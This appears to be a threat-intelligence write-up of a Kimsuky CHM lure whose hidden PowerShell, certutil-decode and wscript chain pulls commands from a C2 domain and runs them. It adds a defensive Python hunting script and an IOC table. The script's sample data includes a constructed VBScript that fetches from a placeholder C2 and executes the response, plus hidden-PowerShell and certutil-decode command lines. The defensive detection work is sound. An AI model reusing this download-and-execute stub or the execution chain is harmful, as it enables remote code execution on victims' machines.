Malware created by the North Korean hacking group Kimsuky - SecurityMail.chm (2025.3.31)

2025-06-05 Sakai Malware Created by North Korean Hacking Group Kimsuky - SecurityMail.chm (2025.3.31)

http://wezard4u.tistory.com/429504


A Kimsuky-linked CHM file named SecurityMail.chm displays a Korean virtual-asset (cryptocurrency) user-protection notice as a decoy, while the compiled HTML help content carries the malicious execution logic. The embedded HTML abuses an ActiveX object to launch a hidden PowerShell process; that process writes a Base64-encoded payload into the user's Links directory, decodes it with certutil, and runs the resulting script with wscript. The decoded script instantiates a Microsoft.XMLHTTP object, requests commands from noreplymail[.]space under the BitJoker path with a randomized tag parameter, and executes whatever the server returns, which gives the operator remote code execution and a channel for follow-on command delivery. For defenders, the chain is visible in process telemetry as the CHM viewer (hh.exe) spawning powershell.exe, certutil.exe invoked with -decode against a file in the Links directory, and wscript.exe executing a script from that same directory. The lure content and the author's assessment point to possible cryptocurrency-related targeting; the infrastructure note ties the domain to 46.202.158[.]9 and to prior Konni-associated URL usage.
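The execution chain above maps directly onto process-creation telemetry, so a hunt for it can be written without any sample of the CHM. The following Python is an added example, not code from the original post or from the author: it runs three stage checks (hh.exe spawning PowerShell, certutil -decode targeting the Links directory, a script host launched from Links) over constructed Sysmon-style process records and confirms each hit descends from hh.exe, then triages a decoded script by flagging Microsoft.XMLHTTP use and pulling out the URL it contacts. The sample events, the paths, the C2 placeholder URL and the script text are all constructed for the example and are not indicators from the report.

```python
"""Hunt for the CHM -> hidden PowerShell -> certutil -decode -> wscript chain.

Added example (not from the original post). Input records mimic Sysmon
Event ID 1 fields; the events, paths and URLs below are constructed.
"""
import re
from dataclasses import dataclass


@dataclass
class ProcEvent:
    pid: int
    ppid: int
    image: str      # full path of the created process
    cmdline: str    # command line as logged


# --- constructed sample telemetry (not real data) ---------------------------
SAMPLE_EVENTS = [
    ProcEvent(100, 50, r"C:\Windows\explorer.exe", "explorer.exe"),
    ProcEvent(200, 100, r"C:\Windows\hh.exe",
              r'"C:\Windows\hh.exe" C:\Users\victim\Downloads\SecurityMail.chm'),
    ProcEvent(300, 200, r"C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe",
              "powershell.exe -WindowStyle Hidden -Command ..."),
    ProcEvent(400, 300, r"C:\Windows\System32\certutil.exe",
              r"certutil -decode C:\Users\victim\Links\stage.txt C:\Users\victim\Links\stage.vbs"),
    ProcEvent(500, 300, r"C:\Windows\System32\wscript.exe",
              r"wscript.exe C:\Users\victim\Links\stage.vbs"),
    # benign noise: an admin hashing a download from Explorer, must not match
    ProcEvent(600, 100, r"C:\Windows\System32\certutil.exe",
              "certutil -hashfile setup.exe SHA256"),
]

# Constructed stand-in for a decoded stage script (placeholder C2, not the real one)
SAMPLE_DECODED = (
    'Set h = CreateObject("Microsoft.XMLHTTP")\n'
    'h.Open "GET", "http://c2.example/stage?tag=" & Rnd, False\n'
    'h.Send\n'
    'Execute h.responseText\n'
)

LINKS_DIR = re.compile(r"\\links\\", re.IGNORECASE)
DECODE_FLAG = re.compile(r"(^|\s)[-/]decode(\s|$)", re.IGNORECASE)
XMLHTTP = re.compile(r"Microsoft\.XMLHTTP", re.IGNORECASE)
URL = re.compile(r"https?://[^\s\"']+", re.IGNORECASE)


def _name(image: str) -> str:
    return image.rsplit("\\", 1)[-1].lower()


def ancestors(pid, by_pid):
    """Yield parent, grandparent, ... of pid; stop at an unknown parent or a loop."""
    seen = set()
    ev = by_pid.get(pid)
    while ev is not None and ev.ppid in by_pid and ev.ppid not in seen:
        seen.add(ev.ppid)
        ev = by_pid[ev.ppid]
        yield ev


def classify(ev, by_pid):
    """Return which stage of the chain this event matches, or None."""
    n = _name(ev.image)
    parent = by_pid.get(ev.ppid)
    if n == "powershell.exe" and parent is not None and _name(parent.image) == "hh.exe":
        return "chm_spawns_powershell"
    if n == "certutil.exe" and DECODE_FLAG.search(ev.cmdline) and LINKS_DIR.search(ev.cmdline):
        return "certutil_decode_in_links"
    if n in ("wscript.exe", "cscript.exe") and LINKS_DIR.search(ev.cmdline):
        return "script_host_from_links"
    return None


def find_chains(events):
    """Return one hit per matching event, noting whether hh.exe is in its lineage."""
    by_pid = {e.pid: e for e in events}
    hits = []
    for ev in events:
        stage = classify(ev, by_pid)
        if stage is None:
            continue
        lineage = [ev] + list(ancestors(ev.pid, by_pid))
        rooted = any(_name(a.image) == "hh.exe" for a in lineage)
        hits.append({"pid": ev.pid, "stage": stage, "rooted_in_chm": rooted})
    return hits


def triage_decoded_script(text):
    """If the script builds a Microsoft.XMLHTTP object, return the URLs it references."""
    if not XMLHTTP.search(text):
        return []
    return URL.findall(text)


if __name__ == "__main__":
    for hit in find_chains(SAMPLE_EVENTS):
        print(hit)
    print(triage_decoded_script(SAMPLE_DECODED))
```

The lineage walk matters more than the individual signatures: certutil -decode and wscript are common enough in administrative use that each rule alone is noisy, but the three stages sharing an hh.exe ancestor is a tight, low-false-positive pattern. The URL regex stops at the closing quote, so a script that appends the randomized tag at runtime still yields the static prefix to pivot on.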

Indicators of Compromise

Type    Value                               First Seen   Last Seen
HASH    7047878f4fbea323148f6554afe6169…    2025-06-05   2026-04-17
HASH    a76af8176da28fdab47f9a77d50eb0e…    2025-06-05   2026-04-17
HASH    4599ac1bbe483c73064df1353feafd01    2025-06-05   2026-04-17
DOMAIN  noreplymail.space                   2025-06-05   2026-04-17
URL     http://noreplymail.space/BitJok…    2025-06-05   2025-06-05
URL     http://noreplymail.space/BitJ       2025-06-05   2025-06-05
IPv4    46.202.158.9                        2025-06-05   2025-06-05
